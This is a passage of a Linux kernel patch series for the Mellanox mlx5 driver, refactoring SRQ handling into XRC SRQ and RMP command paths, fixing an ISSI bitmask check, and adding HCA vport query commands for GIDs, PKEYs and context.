xrcsrq_in, opcode, + MLX5_CMD_OP_QUERY_XRC_SRQ); + MLX5_SET(query_xrc_srq_in, xrcsrq_in, xrc_srqn, srq->srqn); + err = mlx5_cmd_exec_check_status(dev, xrcsrq_in, sizeof(xrcsrq_in), + xrcsrq_out, + MLX5_ST_SZ_BYTES(query_xrc_srq_out)); + if (err) + goto out; + + xrc_srqc = MLX5_ADDR_OF(query_xrc_srq_out, xrcsrq_out, + xrc_srq_context_entry); + srqc = MLX5_ADDR_OF(query_srq_out, out, srq_context_entry); + memcpy(srqc, xrc_srqc, MLX5_ST_SZ_BYTES(srqc)); + +out: + kvfree(xrcsrq_out); + return err; +} + +static int create_rmp_cmd(struct mlx5_core_dev *dev, struct mlx5_core_srq *srq, + struct mlx5_create_srq_mbox_in *in, int srq_inlen) +{ + 
void *create_in; + void *rmpc; + void *srqc; + int pas_size; + int inlen; + int err; + + srqc = MLX5_ADDR_OF(create_srq_in, in, srq_context_entry); + pas_size = get_pas_size(srqc); + inlen = MLX5_ST_SZ_BYTES(create_rmp_in) + pas_size; + create_in = mlx5_vzalloc(inlen); + if (!create_in) + return -ENOMEM; + + rmpc = MLX5_ADDR_OF(create_rmp_in, create_in, ctx); + + memcpy(MLX5_ADDR_OF(rmpc, rmpc, wq.pas), in->pas, pas_size); + rmpc_srqc_reformat(srqc, rmpc, true); + + err = mlx5_core_create_rmp(dev, create_in, inlen, &srq->srqn); + + kvfree(create_in); + return err; +} + +static int destroy_rmp_cmd(struct mlx5_core_dev *dev, + struct mlx5_core_srq *srq) +{ + return mlx5_core_destroy_rmp(dev, srq->srqn); +} + +static int arm_rmp_cmd(struct mlx5_core_dev *dev, + struct mlx5_core_srq *srq, + u16 lwm) +{ + void *in; + void *rmpc; + void *wq; + void *bitmask; + int err; + + in = mlx5_vzalloc(MLX5_ST_SZ_BYTES(modify_rmp_in)); + if (!in) + return -ENOMEM; + + rmpc = MLX5_ADDR_OF(modify_rmp_in, in, ctx); + bitmask = MLX5_ADDR_OF(modify_rmp_in, in, bitmask); + wq = MLX5_ADDR_OF(rmpc, rmpc, wq); + + MLX5_SET(modify_rmp_in, in, rmp_state, MLX5_RMPC_STATE_RDY); + MLX5_SET(modify_rmp_in, in, rmpn, srq->srqn); + MLX5_SET(wq, wq, lwm, lwm); + MLX5_SET(rmp_bitmask, bitmask, lwm, 1); + MLX5_SET(rmpc, rmpc, state, MLX5_RMPC_STATE_RDY); + + err = mlx5_core_modify_rmp(dev, in, MLX5_ST_SZ_BYTES(modify_rmp_in)); + + kvfree(in); + return err; +} + +static int query_rmp_cmd(struct mlx5_core_dev *dev, struct mlx5_core_srq *srq, + struct mlx5_query_srq_mbox_out *out) +{ + u32 *rmp_out; + void *rmpc; + void *srqc; + int err; + + rmp_out = mlx5_vzalloc(MLX5_ST_SZ_BYTES(query_rmp_out)); + if (!rmp_out) + return -ENOMEM; + + err = mlx5_core_query_rmp(dev, srq->srqn, rmp_out); + if (err) + goto out; + + srqc = MLX5_ADDR_OF(query_srq_out, out, srq_context_entry); + rmpc = MLX5_ADDR_OF(query_rmp_out, rmp_out, rmp_context); + rmpc_srqc_reformat(srqc, rmpc, false); + +out: + kvfree(rmp_out); + return err; +} + +static int create_srq_split(struct mlx5_core_dev *dev, + struct mlx5_core_srq *srq, + struct mlx5_create_srq_mbox_in *in, + int inlen, int is_xrc) +{ + if (!dev->issi) + return create_srq_cmd(dev, srq, in, inlen); + else if (srq->common.res == MLX5_RES_XSRQ) + return create_xrc_srq_cmd(dev, srq, in, inlen); + else + return create_rmp_cmd(dev, srq, in, inlen); +} + +static int destroy_srq_split(struct mlx5_core_dev *dev, + struct mlx5_core_srq *srq) +{ + if (!dev->issi) + return destroy_srq_cmd(dev, srq); + else if (srq->common.res == MLX5_RES_XSRQ) + return destroy_xrc_srq_cmd(dev, srq); + else + return destroy_rmp_cmd(dev, srq); +} + +int mlx5_core_create_srq(struct mlx5_core_dev *dev, struct mlx5_core_srq *srq, + struct mlx5_create_srq_mbox_in *in, int inlen, + int is_xrc) +{ + int err; + struct mlx5_srq_table *table = &dev->priv.srq_table; + + srq->common.res = is_xrc ? 
MLX5_RES_XSRQ : MLX5_RES_SRQ; + + err = create_srq_split(dev, srq, in, inlen, is_xrc); + if (err) + return err; + atomic_set(&srq->refcount, 1); init_completion(&srq->free); @@ -107,25 +461,20 @@ int mlx5_core_create_srq(struct mlx5_core_dev *dev, struct mlx5_core_srq *srq, spin_unlock_irq(&table->lock); if (err) { mlx5_core_warn(dev, "err %d, srqn 0x%x\n", err, srq->srqn); - goto err_cmd; + goto err_destroy_srq_split; } return 0; -err_cmd: - memset(&din, 0, sizeof(din)); - memset(&dout, 0, sizeof(dout)); - din.srqn = cpu_to_be32(srq->srqn); - din.hdr.opcode = cpu_to_be16(MLX5_CMD_OP_DESTROY_SRQ); - mlx5_cmd_exec(dev, &din, sizeof(din), &dout, sizeof(dout)); +err_destroy_srq_split: + destroy_srq_split(dev, srq); + return err; } EXPORT_SYMBOL(mlx5_core_create_srq); int mlx5_core_destroy_srq(struct mlx5_core_dev *dev, struct mlx5_core_srq *srq) { - struct mlx5_destroy_srq_mbox_in in; - struct mlx5_destroy_srq_mbox_out out; struct mlx5_srq_table *table = &dev->priv.srq_table; struct mlx5_core_srq *tmp; int err; @@ -142,17 +491,10 @@ int mlx5_core_destroy_srq(struct mlx5_core_dev *dev, struct mlx5_core_srq *srq) return -EINVAL; } - memset(&in, 0, sizeof(in)); - memset(&out, 0, sizeof(out)); - in.hdr.opcode = cpu_to_be16(MLX5_CMD_OP_DESTROY_SRQ); - in.srqn = cpu_to_be32(srq->srqn); - err = mlx5_cmd_exec(dev, &in, sizeof(in), &out, sizeof(out)); + err = destroy_srq_split(dev, srq); if (err) return err; - if (out.hdr.status) - return mlx5_cmd_status_to_err(&out.hdr); - if (atomic_dec_and_test(&srq->refcount)) complete(&srq->free); wait_for_completion(&srq->free); @@ -164,48 +506,24 @@ EXPORT_SYMBOL(mlx5_core_destroy_srq); int mlx5_core_query_srq(struct mlx5_core_dev *dev, struct mlx5_core_srq *srq, struct mlx5_query_srq_mbox_out *out) { - struct mlx5_query_srq_mbox_in in; - int err; - - memset(&in, 0, sizeof(in)); - memset(out, 0, sizeof(*out)); - - in.hdr.opcode = cpu_to_be16(MLX5_CMD_OP_QUERY_SRQ); - in.srqn = cpu_to_be32(srq->srqn); - err = mlx5_cmd_exec(dev, &in, sizeof(in), out, sizeof(*out)); - if (err) - return err; - - if (out->hdr.status) - return mlx5_cmd_status_to_err(&out->hdr); - - return err; + if (!dev->issi) + return query_srq_cmd(dev, srq, out); + else if (srq->common.res == MLX5_RES_XSRQ) + return query_xrc_srq_cmd(dev, srq, out); + else + return query_rmp_cmd(dev, srq, out); } EXPORT_SYMBOL(mlx5_core_query_srq); int mlx5_core_arm_srq(struct mlx5_core_dev *dev, struct mlx5_core_srq *srq, u16 lwm, int is_srq) { - struct mlx5_arm_srq_mbox_in in; - struct mlx5_arm_srq_mbox_out out; - int err; - - memset(&in, 0, sizeof(in)); - memset(&out, 0, sizeof(out)); - - in.hdr.opcode = cpu_to_be16(MLX5_CMD_OP_ARM_RQ); - in.hdr.opmod = cpu_to_be16(!!is_srq); - in.srqn = cpu_to_be32(srq->srqn); - in.lwm = cpu_to_be16(lwm); - - err = mlx5_cmd_exec(dev, &in, sizeof(in), &out, sizeof(out)); - if (err) - return err; - - if (out.hdr.status) - return mlx5_cmd_status_to_err(&out.hdr); - - return err; + if (!dev->issi) + return arm_srq_cmd(dev, srq, lwm, is_srq); + else if (srq->common.res == MLX5_RES_XSRQ) + return arm_xrc_srq_cmd(dev, srq, lwm); + else + return arm_rmp_cmd(dev, srq, lwm); } EXPORT_SYMBOL(mlx5_core_arm_srq); diff --git a/drivers/net/ethernet/mellanox/mlx5/core/transobj.c b/drivers/net/ethernet/mellanox/mlx5/core/transobj.c index d918816ac4d8..7a120283de2c 100644 --- a/drivers/net/ethernet/mellanox/mlx5/core/transobj.c +++ b/drivers/net/ethernet/mellanox/mlx5/core/transobj.c @@ -169,3 +169,157 @@ void mlx5_core_destroy_tis(struct mlx5_core_dev *dev, u32 tisn) 
mlx5_cmd_exec_check_status(dev, in, sizeof(in), out, sizeof(out)); } + +int mlx5_core_create_rmp(struct mlx5_core_dev *dev, u32 *in, int inlen, + u32 *rmpn) +{ + u32 out[MLX5_ST_SZ_DW(create_rmp_out)]; + int err; + + MLX5_SET(create_rmp_in, in, opcode, MLX5_CMD_OP_CREATE_RMP); + + memset(out, 0, sizeof(out)); + err = mlx5_cmd_exec_check_status(dev, in, inlen, out, sizeof(out)); + if (!err) + *rmpn = MLX5_GET(create_rmp_out, out, rmpn); + + return err; +} + +int mlx5_core_modify_rmp(struct mlx5_core_dev *dev, u32 *in, int inlen) +{ + u32 out[MLX5_ST_SZ_DW(modify_rmp_out)]; + + MLX5_SET(modify_rmp_in, in, opcode, MLX5_CMD_OP_MODIFY_RMP); + + memset(out, 0, sizeof(out)); + return mlx5_cmd_exec_check_status(dev, in, inlen, out, sizeof(out)); +} + +int mlx5_core_destroy_rmp(struct mlx5_core_dev *dev, u32 rmpn) +{ + u32 in[MLX5_ST_SZ_DW(destroy_rmp_in)]; + u32 out[MLX5_ST_SZ_DW(destroy_rmp_out)]; + + memset(in, 0, sizeof(in)); + + MLX5_SET(destroy_rmp_in, in, opcode, MLX5_CMD_OP_DESTROY_RMP); + MLX5_SET(destroy_rmp_in, in, rmpn, rmpn); + + return mlx5_cmd_exec_check_status(dev, in, sizeof(in), out, + sizeof(out)); +} + +int mlx5_core_query_rmp(struct mlx5_core_dev *dev, u32 rmpn, u32 *out) +{ + u32 in[MLX5_ST_SZ_DW(query_rmp_in)]; + int outlen = MLX5_ST_SZ_BYTES(query_rmp_out); + + memset(in, 0, sizeof(in)); + MLX5_SET(query_rmp_in, in, opcode, MLX5_CMD_OP_QUERY_RMP); + MLX5_SET(query_rmp_in, in, rmpn, rmpn); + + return mlx5_cmd_exec_check_status(dev, in, sizeof(in), out, outlen); +} + +int mlx5_core_arm_rmp(struct mlx5_core_dev *dev, u32 rmpn, u16 lwm) +{ + void *in; + void *rmpc; + void *wq; + void *bitmask; + int err; + + in = mlx5_vzalloc(MLX5_ST_SZ_BYTES(modify_rmp_in)); + if (!in) + return -ENOMEM; + + rmpc = MLX5_ADDR_OF(modify_rmp_in, in, ctx); + bitmask = MLX5_ADDR_OF(modify_rmp_in, in, bitmask); + wq = MLX5_ADDR_OF(rmpc, rmpc, wq); + + MLX5_SET(modify_rmp_in, in, rmp_state, MLX5_RMPC_STATE_RDY); + MLX5_SET(modify_rmp_in, in, rmpn, rmpn); + MLX5_SET(wq, wq, lwm, lwm); + MLX5_SET(rmp_bitmask, bitmask, lwm, 1); + MLX5_SET(rmpc, rmpc, state, MLX5_RMPC_STATE_RDY); + + err = mlx5_core_modify_rmp(dev, in, MLX5_ST_SZ_BYTES(modify_rmp_in)); + + kvfree(in); + + return err; +} + +int mlx5_core_create_xsrq(struct mlx5_core_dev *dev, u32 *in, int inlen, + u32 *xsrqn) +{ + u32 out[MLX5_ST_SZ_DW(create_xrc_srq_out)]; + int err; + + MLX5_SET(create_xrc_srq_in, in, opcode, MLX5_CMD_OP_CREATE_XRC_SRQ); + + memset(out, 0, sizeof(out)); + err = mlx5_cmd_exec_check_status(dev, in, inlen, out, sizeof(out)); + if (!err) + *xsrqn = MLX5_GET(create_xrc_srq_out, out, xrc_srqn); + + return err; +} + +int mlx5_core_destroy_xsrq(struct mlx5_core_dev *dev, u32 xsrqn) +{ + u32 in[MLX5_ST_SZ_DW(destroy_xrc_srq_in)]; + u32 out[MLX5_ST_SZ_DW(destroy_xrc_srq_out)]; + + memset(in, 0, sizeof(in)); + memset(out, 0, sizeof(out)); + + MLX5_SET(destroy_xrc_srq_in, in, opcode, MLX5_CMD_OP_DESTROY_XRC_SRQ); + MLX5_SET(destroy_xrc_srq_in, in, xrc_srqn, xsrqn); + + return mlx5_cmd_exec_check_status(dev, in, sizeof(in), out, + sizeof(out)); +} + +int mlx5_core_query_xsrq(struct mlx5_core_dev *dev, u32 xsrqn, u32 *out) +{ + u32 in[MLX5_ST_SZ_DW(query_xrc_srq_in)]; + void *srqc; + void *xrc_srqc; + int err; + + memset(in, 0, sizeof(in)); + MLX5_SET(query_xrc_srq_in, in, opcode, MLX5_CMD_OP_QUERY_XRC_SRQ); + MLX5_SET(query_xrc_srq_in, in, xrc_srqn, xsrqn); + + err = mlx5_cmd_exec_check_status(dev, in, sizeof(in), + out, + MLX5_ST_SZ_BYTES(query_xrc_srq_out)); + if (!err) { + xrc_srqc = MLX5_ADDR_OF(query_xrc_srq_out, out, + 
xrc_srq_context_entry); + srqc = MLX5_ADDR_OF(query_srq_out, out, srq_context_entry); + memcpy(srqc, xrc_srqc, MLX5_ST_SZ_BYTES(srqc)); + } + + return err; +} + +int mlx5_core_arm_xsrq(struct mlx5_core_dev *dev, u32 xsrqn, u16 lwm) +{ + u32 in[MLX5_ST_SZ_DW(arm_xrc_srq_in)]; + u32 out[MLX5_ST_SZ_DW(arm_xrc_srq_out)]; + + memset(in, 0, sizeof(in)); + memset(out, 0, sizeof(out)); + + MLX5_SET(arm_xrc_srq_in, in, opcode, MLX5_CMD_OP_ARM_XRC_SRQ); + MLX5_SET(arm_xrc_srq_in, in, xrc_srqn, xsrqn); + MLX5_SET(arm_xrc_srq_in, in, lwm, lwm); + MLX5_SET(arm_xrc_srq_in, in, op_mod, + MLX5_ARM_XRC_SRQ_IN_OP_MOD_XRC_SRQ); + + return mlx5_cmd_exec_check_status(dev, in, sizeof(in), out, + sizeof(out)); +} diff --git a/drivers/net/ethernet/mellanox/mlx5/core/transobj.h b/drivers/net/ethernet/mellanox/mlx5/core/transobj.h index b71d77f61a1d..90322c11361f 100644 --- a/drivers/net/ethernet/mellanox/mlx5/core/transobj.h +++ b/drivers/net/ethernet/mellanox/mlx5/core/transobj.h @@ -47,5 +47,16 @@ void mlx5_core_destroy_tir(struct mlx5_core_dev *dev, u32 tirn); int mlx5_core_create_tis(struct mlx5_core_dev *dev, u32 *in, int inlen, u32 *tisn); void mlx5_core_destroy_tis(struct mlx5_core_dev *dev, u32 tisn); +int mlx5_core_create_rmp(struct mlx5_core_dev *dev, u32 *in, int inlen, + u32 *rmpn); +int mlx5_core_modify_rmp(struct mlx5_core_dev *dev, u32 *in, int inlen); +int mlx5_core_destroy_rmp(struct mlx5_core_dev *dev, u32 rmpn); +int mlx5_core_query_rmp(struct mlx5_core_dev *dev, u32 rmpn, u32 *out); +int mlx5_core_arm_rmp(struct mlx5_core_dev *dev, u32 rmpn, u16 lwm); +int mlx5_core_create_xsrq(struct mlx5_core_dev *dev, u32 *in, int inlen, + u32 *rmpn); +int mlx5_core_destroy_xsrq(struct mlx5_core_dev *dev, u32 rmpn); +int mlx5_core_query_xsrq(struct mlx5_core_dev *dev, u32 rmpn, u32 *out); +int mlx5_core_arm_xsrq(struct mlx5_core_dev *dev, u32 rmpn, u16 lwm); #endif /* __TRANSOBJ_H__ */ diff --git a/include/linux/mlx5/driver.h b/include/linux/mlx5/driver.h index 7fa26f03acc1..ba9f212c94bb 100644 --- a/include/linux/mlx5/driver.h +++ b/include/linux/mlx5/driver.h @@ -339,6 +339,8 @@ struct mlx5_core_mr { enum mlx5_res_type { MLX5_RES_QP, + MLX5_RES_SRQ, + MLX5_RES_XSRQ, }; struct mlx5_core_rsc_common { @@ -348,6 +350,7 @@ struct mlx5_core_rsc_common { }; struct mlx5_core_srq { + struct mlx5_core_rsc_common common; /* must be first */ u32 srqn; int max; int max_gs; @@ -640,7 +643,8 @@ struct mlx5_cmd_mailbox *mlx5_alloc_cmd_mailbox_chain(struct mlx5_core_dev *dev, void mlx5_free_cmd_mailbox_chain(struct mlx5_core_dev *dev, struct mlx5_cmd_mailbox *head); int mlx5_core_create_srq(struct mlx5_core_dev *dev, struct mlx5_core_srq *srq, - struct mlx5_create_srq_mbox_in *in, int inlen); + struct mlx5_create_srq_mbox_in *in, int inlen, + int is_xrc); int mlx5_core_destroy_srq(struct mlx5_core_dev *dev, struct mlx5_core_srq *srq); int mlx5_core_query_srq(struct mlx5_core_dev *dev, struct mlx5_core_srq *srq, struct mlx5_query_srq_mbox_out *out); diff --git a/include/linux/mlx5/mlx5_ifc.h b/include/linux/mlx5/mlx5_ifc.h index b27e9f6e090a..dbe2b32c0539 100644 --- a/include/linux/mlx5/mlx5_ifc.h +++ b/include/linux/mlx5/mlx5_ifc.h @@ -2022,12 +2022,9 @@ struct mlx5_ifc_srqc_bits { u8 reserved_9[0x40]; - u8 db_record_addr_h[0x20]; - - u8 db_record_addr_l[0x1e]; - u8 reserved_10[0x2]; + u8 dbr_addr[0x40]; - u8 reserved_11[0x80]; + u8 reserved_10[0x80]; }; enum { @@ -4167,6 +4164,13 @@ struct mlx5_ifc_modify_rmp_out_bits { u8 reserved_1[0x40]; }; +struct mlx5_ifc_rmp_bitmask_bits { + u8 reserved[0x20]; + + u8 
reserved1[0x1f]; + u8 lwm[0x1]; +}; + struct mlx5_ifc_modify_rmp_in_bits { u8 opcode[0x10]; u8 reserved_0[0x10]; @@ -4180,7 +4184,7 @@ struct mlx5_ifc_modify_rmp_in_bits { u8 reserved_3[0x20]; - u8 modify_bitmask[0x40]; + struct mlx5_ifc_rmp_bitmask_bits bitmask; u8 reserved_4[0x40]; From e74a1db03326ecdc7c3f54a581b197a26ce5eebe Mon Sep 17 00:00:00 2001 From: Haggai Abramonvsky Date: Thu, 4 Jun 2015 19:30:39 +0300 Subject: [PATCH 710/872] net/mlx5_core: Check the return bitmask when querying ISSI The determination of the supported ISSI versions should be conditioned on the returned mask, and not only on the return status of the query ISSI command; fix that. Signed-off-by: Haggai Abramovsky Signed-off-by: Majd Dibbiny Signed-off-by: Or Gerlitz Signed-off-by: David S. Miller --- drivers/net/ethernet/mellanox/mlx5/core/main.c | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/drivers/net/ethernet/mellanox/mlx5/core/main.c b/drivers/net/ethernet/mellanox/mlx5/core/main.c index 2510fed3494d..11c7216a2517 100644 --- a/drivers/net/ethernet/mellanox/mlx5/core/main.c +++ b/drivers/net/ethernet/mellanox/mlx5/core/main.c @@ -654,7 +654,7 @@ static int mlx5_core_set_issi(struct mlx5_core_dev *dev) dev->issi = 1; return 0; - } else if (sup_issi & (1 << 0)) { + } else if (sup_issi & (1 << 0) || !sup_issi) { return 0; } From d18a9470f89727f870db944a36223bf1bb15bdc1 Mon Sep 17 00:00:00 2001 From: Majd Dibbiny Date: Thu, 4 Jun 2015 19:30:40 +0300 Subject: [PATCH 711/872] net/mlx5_core: Make the vport helpers available for the IB driver too Move the vport header file to be under include/linux/mlx5, such that the mlx5 IB can use it as well. Also add nic_ prefix to the vport NIC commands to differentiate between HCA vport commands and NIC vport commands. Signed-off-by: Majd Dibbiny Signed-off-by: Or Gerlitz Signed-off-by: David S. 
Miller --- drivers/net/ethernet/mellanox/mlx5/core/en.h | 2 +- drivers/net/ethernet/mellanox/mlx5/core/en_main.c | 2 +- drivers/net/ethernet/mellanox/mlx5/core/vport.c | 6 ++++-- .../mellanox/mlx5/core => include/linux/mlx5}/vport.h | 2 +- 4 files changed, 7 insertions(+), 5 deletions(-) rename {drivers/net/ethernet/mellanox/mlx5/core => include/linux/mlx5}/vport.h (95%) diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en.h b/drivers/net/ethernet/mellanox/mlx5/core/en.h index cbb3c7cb53f7..e9edb7210de1 100644 --- a/drivers/net/ethernet/mellanox/mlx5/core/en.h +++ b/drivers/net/ethernet/mellanox/mlx5/core/en.h @@ -35,7 +35,7 @@ #include #include #include -#include "vport.h" +#include #include "wq.h" #include "transobj.h" #include "mlx5_core.h" diff --git a/drivers/net/ethernet/mellanox/mlx5/core/en_main.c b/drivers/net/ethernet/mellanox/mlx5/core/en_main.c index 1b592913d4d7..edba09cca600 100644 --- a/drivers/net/ethernet/mellanox/mlx5/core/en_main.c +++ b/drivers/net/ethernet/mellanox/mlx5/core/en_main.c @@ -1715,7 +1715,7 @@ static void mlx5e_set_netdev_dev_addr(struct net_device *netdev) { struct mlx5e_priv *priv = netdev_priv(netdev); - mlx5_query_vport_mac_address(priv->mdev, netdev->dev_addr); + mlx5_query_nic_vport_mac_address(priv->mdev, netdev->dev_addr); } static void mlx5e_build_netdev(struct net_device *netdev) diff --git a/drivers/net/ethernet/mellanox/mlx5/core/vport.c b/drivers/net/ethernet/mellanox/mlx5/core/vport.c index ba374b9a6c87..32c4e03f6d3c 100644 --- a/drivers/net/ethernet/mellanox/mlx5/core/vport.c +++ b/drivers/net/ethernet/mellanox/mlx5/core/vport.c @@ -33,7 +33,7 @@ #include #include #include -#include "vport.h" +#include #include "mlx5_core.h" u8 mlx5_query_vport_state(struct mlx5_core_dev *mdev, u8 opmod) @@ -55,8 +55,9 @@ u8 mlx5_query_vport_state(struct mlx5_core_dev *mdev, u8 opmod) return MLX5_GET(query_vport_state_out, out, state); } +EXPORT_SYMBOL(mlx5_query_vport_state); -void mlx5_query_vport_mac_address(struct mlx5_core_dev *mdev, u8 *addr) +void mlx5_query_nic_vport_mac_address(struct mlx5_core_dev *mdev, u8 *addr) { u32 in[MLX5_ST_SZ_DW(query_nic_vport_context_in)]; u32 *out; @@ -82,3 +83,4 @@ void mlx5_query_vport_mac_address(struct mlx5_core_dev *mdev, u8 *addr) kvfree(out); } +EXPORT_SYMBOL(mlx5_query_nic_vport_mac_address); diff --git a/drivers/net/ethernet/mellanox/mlx5/core/vport.h b/include/linux/mlx5/vport.h similarity index 95% rename from drivers/net/ethernet/mellanox/mlx5/core/vport.h rename to include/linux/mlx5/vport.h index c05ca2c3419d..99d0e9f85432 100644 --- a/drivers/net/ethernet/mellanox/mlx5/core/vport.h +++ b/include/linux/mlx5/vport.h @@ -36,6 +36,6 @@ #include u8 mlx5_query_vport_state(struct mlx5_core_dev *mdev, u8 opmod); -void mlx5_query_vport_mac_address(struct mlx5_core_dev *mdev, u8 *addr); +void mlx5_query_nic_vport_mac_address(struct mlx5_core_dev *mdev, u8 *addr); #endif /* __MLX5_VPORT_H__ */ From 707c4602cda6624940761b66a4119f1909492385 Mon Sep 17 00:00:00 2001 From: Majd Dibbiny Date: Thu, 4 Jun 2015 19:30:41 +0300 Subject: [PATCH 712/872] net/mlx5_core: Add new query HCA vport commands Added the implementation for the following commands: 1. QUERY_HCA_VPORT_GID 2. QUERY_HCA_VPORT_PKEY 3. QUERY_HCA_VPORT_CONTEXT They will be needed when we move to work with ISSI > 0 in the IB driver too. Signed-off-by: Majd Dibbiny Signed-off-by: Or Gerlitz Signed-off-by: David S. 
Miller --- .../net/ethernet/mellanox/mlx5/core/Makefile | 4 +- .../net/ethernet/mellanox/mlx5/core/main.c | 10 +- .../net/ethernet/mellanox/mlx5/core/vport.c | 259 ++++++++++++++++++ include/linux/mlx5/device.h | 13 + include/linux/mlx5/driver.h | 45 +++ include/linux/mlx5/mlx5_ifc.h | 23 +- include/linux/mlx5/vport.h | 14 + 7 files changed, 349 insertions(+), 19 deletions(-) diff --git a/drivers/net/ethernet/mellanox/mlx5/core/Makefile b/drivers/net/ethernet/mellanox/mlx5/core/Makefile index 07540f732df1..26a68b8af2c5 100644 --- a/drivers/net/ethernet/mellanox/mlx5/core/Makefile +++ b/drivers/net/ethernet/mellanox/mlx5/core/Makefile @@ -2,7 +2,7 @@ obj-$(CONFIG_MLX5_CORE) += mlx5_core.o mlx5_core-y := main.o cmd.o debugfs.o fw.o eq.o uar.o pagealloc.o \ health.o mcg.o cq.o srq.o alloc.o qp.o port.o mr.o pd.o \ - mad.o transobj.o -mlx5_core-$(CONFIG_MLX5_CORE_EN) += wq.o flow_table.o vport.o \ + mad.o transobj.o vport.o +mlx5_core-$(CONFIG_MLX5_CORE_EN) += wq.o flow_table.o \ en_main.o en_flow_table.o en_ethtool.o en_tx.o en_rx.o \ en_txrx.o diff --git a/drivers/net/ethernet/mellanox/mlx5/core/main.c b/drivers/net/ethernet/mellanox/mlx5/core/main.c index 11c7216a2517..58354122dfe4 100644 --- a/drivers/net/ethernet/mellanox/mlx5/core/main.c +++ b/drivers/net/ethernet/mellanox/mlx5/core/main.c @@ -284,14 +284,6 @@ static u16 to_fw_pkey_sz(u32 size) } } -static u16 to_sw_pkey_sz(int pkey_sz) -{ - if (pkey_sz > MLX5_MAX_LOG_PKEY_TABLE) - return 0; - - return MLX5_MIN_PKEY_TABLE_SIZE << pkey_sz; -} - int mlx5_core_get_caps(struct mlx5_core_dev *dev, enum mlx5_cap_type cap_type, enum mlx5_cap_mode cap_mode) { @@ -386,7 +378,7 @@ static int handle_hca_cap(struct mlx5_core_dev *dev) MLX5_ST_SZ_BYTES(cmd_hca_cap)); mlx5_core_dbg(dev, "Current Pkey table size %d Setting new size %d\n", - to_sw_pkey_sz(MLX5_CAP_GEN(dev, pkey_table_size)), + mlx5_to_sw_pkey_sz(MLX5_CAP_GEN(dev, pkey_table_size)), 128); /* we limit the size of the pkey table to 128 entries for now */ MLX5_SET(cmd_hca_cap, set_hca_cap, pkey_table_size, diff --git a/drivers/net/ethernet/mellanox/mlx5/core/vport.c b/drivers/net/ethernet/mellanox/mlx5/core/vport.c index 32c4e03f6d3c..20150ffa8b16 100644 --- a/drivers/net/ethernet/mellanox/mlx5/core/vport.c +++ b/drivers/net/ethernet/mellanox/mlx5/core/vport.c @@ -84,3 +84,262 @@ void mlx5_query_nic_vport_mac_address(struct mlx5_core_dev *mdev, u8 *addr) kvfree(out); } EXPORT_SYMBOL(mlx5_query_nic_vport_mac_address); + +int mlx5_query_hca_vport_gid(struct mlx5_core_dev *dev, u8 other_vport, + u8 port_num, u16 vf_num, u16 gid_index, + union ib_gid *gid) +{ + int in_sz = MLX5_ST_SZ_BYTES(query_hca_vport_gid_in); + int out_sz = MLX5_ST_SZ_BYTES(query_hca_vport_gid_out); + int is_group_manager; + void *out = NULL; + void *in = NULL; + union ib_gid *tmp; + int tbsz; + int nout; + int err; + + is_group_manager = MLX5_CAP_GEN(dev, vport_group_manager); + tbsz = mlx5_get_gid_table_len(MLX5_CAP_GEN(dev, gid_table_size)); + mlx5_core_dbg(dev, "vf_num %d, index %d, gid_table_size %d\n", + vf_num, gid_index, tbsz); + + if (gid_index > tbsz && gid_index != 0xffff) + return -EINVAL; + + if (gid_index == 0xffff) + nout = tbsz; + else + nout = 1; + + out_sz += nout * sizeof(*gid); + + in = kzalloc(in_sz, GFP_KERNEL); + out = kzalloc(out_sz, GFP_KERNEL); + if (!in || !out) { + err = -ENOMEM; + goto out; + } + + MLX5_SET(query_hca_vport_gid_in, in, opcode, MLX5_CMD_OP_QUERY_HCA_VPORT_GID); + if (other_vport) { + if (is_group_manager) { + MLX5_SET(query_hca_vport_gid_in, in, vport_number, vf_num); + 
MLX5_SET(query_hca_vport_gid_in, in, other_vport, 1); + } else { + err = -EPERM; + goto out; + } + } + MLX5_SET(query_hca_vport_gid_in, in, gid_index, gid_index); + + if (MLX5_CAP_GEN(dev, num_ports) == 2) + MLX5_SET(query_hca_vport_gid_in, in, port_num, port_num); + + err = mlx5_cmd_exec(dev, in, in_sz, out, out_sz); + if (err) + goto out; + + err = mlx5_cmd_status_to_err_v2(out); + if (err) + goto out; + + tmp = out + MLX5_ST_SZ_BYTES(query_hca_vport_gid_out); + gid->global.subnet_prefix = tmp->global.subnet_prefix; + gid->global.interface_id = tmp->global.interface_id; + +out: + kfree(in); + kfree(out); + return err; +} +EXPORT_SYMBOL_GPL(mlx5_query_hca_vport_gid); + +int mlx5_query_hca_vport_pkey(struct mlx5_core_dev *dev, u8 other_vport, + u8 port_num, u16 vf_num, u16 pkey_index, + u16 *pkey) +{ + int in_sz = MLX5_ST_SZ_BYTES(query_hca_vport_pkey_in); + int out_sz = MLX5_ST_SZ_BYTES(query_hca_vport_pkey_out); + int is_group_manager; + void *out = NULL; + void *in = NULL; + void *pkarr; + int nout; + int tbsz; + int err; + int i; + + is_group_manager = MLX5_CAP_GEN(dev, vport_group_manager); + + tbsz = mlx5_to_sw_pkey_sz(MLX5_CAP_GEN(dev, pkey_table_size)); + if (pkey_index > tbsz && pkey_index != 0xffff) + return -EINVAL; + + if (pkey_index == 0xffff) + nout = tbsz; + else + nout = 1; + + out_sz += nout * MLX5_ST_SZ_BYTES(pkey); + + in = kzalloc(in_sz, GFP_KERNEL); + out = kzalloc(out_sz, GFP_KERNEL); + if (!in || !out) { + err = -ENOMEM; + goto out; + } + + MLX5_SET(query_hca_vport_pkey_in, in, opcode, MLX5_CMD_OP_QUERY_HCA_VPORT_PKEY); + if (other_vport) { + if (is_group_manager) { + MLX5_SET(query_hca_vport_pkey_in, in, vport_number, vf_num); + MLX5_SET(query_hca_vport_pkey_in, in, other_vport, 1); + } else { + err = -EPERM; + goto out; + } + } + MLX5_SET(query_hca_vport_pkey_in, in, pkey_index, pkey_index); + + if (MLX5_CAP_GEN(dev, num_ports) == 2) + MLX5_SET(query_hca_vport_pkey_in, in, port_num, port_num); + + err = mlx5_cmd_exec(dev, in, in_sz, out, out_sz); + if (err) + goto out; + + err = mlx5_cmd_status_to_err_v2(out); + if (err) + goto out; + + pkarr = MLX5_ADDR_OF(query_hca_vport_pkey_out, out, pkey); + for (i = 0; i < nout; i++, pkey++, pkarr += MLX5_ST_SZ_BYTES(pkey)) + *pkey = MLX5_GET_PR(pkey, pkarr, pkey); + +out: + kfree(in); + kfree(out); + return err; +} +EXPORT_SYMBOL_GPL(mlx5_query_hca_vport_pkey); + +int mlx5_query_hca_vport_context(struct mlx5_core_dev *dev, + u8 other_vport, u8 port_num, + u16 vf_num, 